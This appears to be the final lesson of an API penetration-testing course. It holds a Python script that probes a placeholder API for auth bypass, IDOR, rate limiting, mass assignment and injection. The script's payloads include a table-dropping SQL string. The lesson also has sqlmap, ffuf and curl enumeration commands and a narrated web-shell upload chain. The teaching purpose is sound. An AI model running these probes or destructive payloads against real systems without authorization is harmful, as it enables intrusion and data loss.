Full API Pentest
๐ฅ Vibe Prompt
"Run an automated pentest on a target API. Check: auth, IDOR, rate limiting, mass assignment, injection."
import requests
BASE = "http://target.api.com"
findings = []
# 1. Auth Bypass
r = requests.get(f"{BASE}/admin", headers={"Authorization": "Bearer invalid"})
if r.status_code == 200:
findings.append("CRITICAL: Auth bypass!")
# 2. IDOR (Insecure Direct Object Reference)
r = requests.get(f"{BASE}/api/orders/1", headers={"Authorization": "Bearer valid_token"})
if r.status_code == 200:
r2 = requests.get(f"{BASE}/api/orders/2", headers={"Authorization": "Bearer valid_token"})
if r2.status_code == 200 and r2.json()["user_id"] != "current_user":
findings.append("HIGH: IDOR - can access other users' orders!")
# 3. Rate Limiting
for _ in range(100):
r = requests.post(f"{BASE}/api/login", json={"user": "admin", "pass": "wrong"})
if r.status_code != 429:
pass # No rate limit
# 4. Mass Assignment
r = requests.post(f"{BASE}/api/user/profile", json={"name": "test", "role": "admin"}, headers={"Authorization": "Bearer token"})
if r.status_code == 200:
findings.append("MEDIUM: Mass Assignment - role parameter accepted!")
# 5. Injection in API params
sqli_payloads = ["' OR 1=1--", "'; DROP TABLE users--", "${7*7}"]
for payload in sqli_payloads:
r = requests.get(f"{BASE}/api/search?q={payload}")
if "error" not in r.text.lower() and r.status_code == 200:
findings.append(f"MEDIUM: Possible injection: {payload}")
for f in findings:
print(f"โ ๏ธ {f}")
API Pentest Checklist
| Check | Tool | |-------|------| | Auth bypass | Burp Repeater | | IDOR | Manual UUID increment | | Rate limiting | Bombardier | | Mass assignment | Add unexpected fields | | Injection | sqlmap | | JWT | jwt_tool |
API Pentest Course Complete! ๐
- โ Recon
- โ Auth Bypass
- โ SQLi/NoSQLi
- โ JWT/Session
- โ Full Pentest
Key Points
- Understand the core concepts thoroughly
- Practice with hands-on code examples
- Apply knowledge to real-world problems
- Review and reinforce through exercises
Further Learning
- Official documentation
- Open source projects on GitHub
- Community forums and discussions
- Related courses and tutorials
Pentest Checklist
Reconnaissance
- [ ] Enumerate subdomains (subfinder, amass)
- [ ] Detect technology stack (wappalyzer, whatweb)
- [ ] Find API documentation (Swagger, OpenAPI, GraphQL introspection)
- [ ] Extract endpoints from JavaScript files (LinkFinder)
- [ ] Check .well-known endpoints
Discovery
- [ ] Fuzz API routes (Kiterunner, ffuf)
- [ ] Identify authentication mechanisms
- [ ] Discover hidden parameters (arjun)
- [ ] Test HTTP methods on all endpoints
- [ ] Check for CORS misconfiguration
Vulnerability Testing
- [ ] SQL injection (sqlmap)
- [ ] NoSQL injection (manual payloads)
- [ ] XSS (dalfox)
- [ ] IDOR (manual + automated)
- [ ] Mass assignment (test extra fields)
- [ ] JWT attacks (jwt_tool)
- [ ] Rate limiting bypass
- [ ] SSRF (test redirects, internal services)
- [ ] Path traversal
- [ ] Server-side template injection
Exploitation
- [ ] Extract sensitive data
- [ ] Escalate privileges
- [ ] Access other users' data
- [ ] Document proof of concept
Reporting
- [ ] Write executive summary
- [ ] Detail each finding with CVSS score
- [ ] Include request/response evidence
- [ ] Provide remediation steps
- [ ] Prioritize by severity
Sample Exploitation Chain
1. Discovery: Found /api/upload endpoint via fuzzing
2. Testing: Uploaded PHP file, got 403 (extension blocked)
3. Bypass: Changed extension .php5 โ got 200
4. Access: Accessed uploaded file at /uploads/shell.php5
5. Escalation: Executed commands on server
6. Impact: Full database access, 50k records extracted
Summary
A complete pentest follows a structured methodology: recon, discovery, vulnerability testing, exploitation, and reporting. Each finding includes evidence and remediation.
Key takeaways: | Methodology: recon -> discovery -> vulnerability testing -> exploitation -> reporting | | Tools: subfinder, kiterunner, sqlmap, jwt_tool, ffuf, burp suite | | Exploitation chain: find endpoint -> test -> bypass -> access -> escalate | | Reporting: executive summary, detailed findings with CVSS, evidence, remediation |
You have completed the API security pentesting course.
Remediation Timeline
| Priority | Timeline | Actions | |----------|----------|---------| | Critical | 24 hours | Fix SQL injection, mass assignment | | High | 1 week | Add rate limiting, JWT hardening | | Medium | 2 weeks | Add security headers, input validation | | Low | 1 month | Server hardening, documentation |
You have completed the API security pentesting course.
Full Pentest Commands Reference
# 1. Recon
subfinder -d example.com | httpx
# 2. Discovery
ffuf -w api-endpoints.txt -u https://api.example.com/FUZZ
# 3. SQL Injection
sqlmap -u "https://api.example.com/users?id=1" --batch --dbs
# 4. XSS
dalfox url https://api.example.com/search?q=test
# 5. JWT
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
# 6. IDOR
for id in {1..100}; do curl -s -o /dev/null -w "%{http_code}
" -H "Authorization: Bearer $TOKEN" "https://api.example.com/api/users/$id"; done | sort | uniq -c
# 7. Rate Limiting
for i in {1..200}; do curl -s -o /dev/null -w "%{http_code}
" https://api.example.com/api/public; done | sort | uniq -c
Next Steps
| Activity | Description | |----------|-------------| | Practice | Set up a vulnerable API lab (DVWA, WebGoat) | | Certifications | Take GPEN, OSCP, or PNPT | | Bug Bounties | Apply skills on HackerOne, Bugcrowd | | Build Tools | Create your own pentest automation scripts |
You have completed the course. You now understand API security pentesting from reconnaissance to reporting.